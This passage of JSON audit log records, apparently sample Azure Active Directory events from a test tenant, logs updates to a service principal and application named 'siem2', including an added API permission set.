"asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": 
"env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "", "OldValue": "", "Name": "Included Updated Properties"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, 
{"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], 
"TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": 
\"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": 
"748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not 
Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", 
"Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", 
"Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": 
\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included 
Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
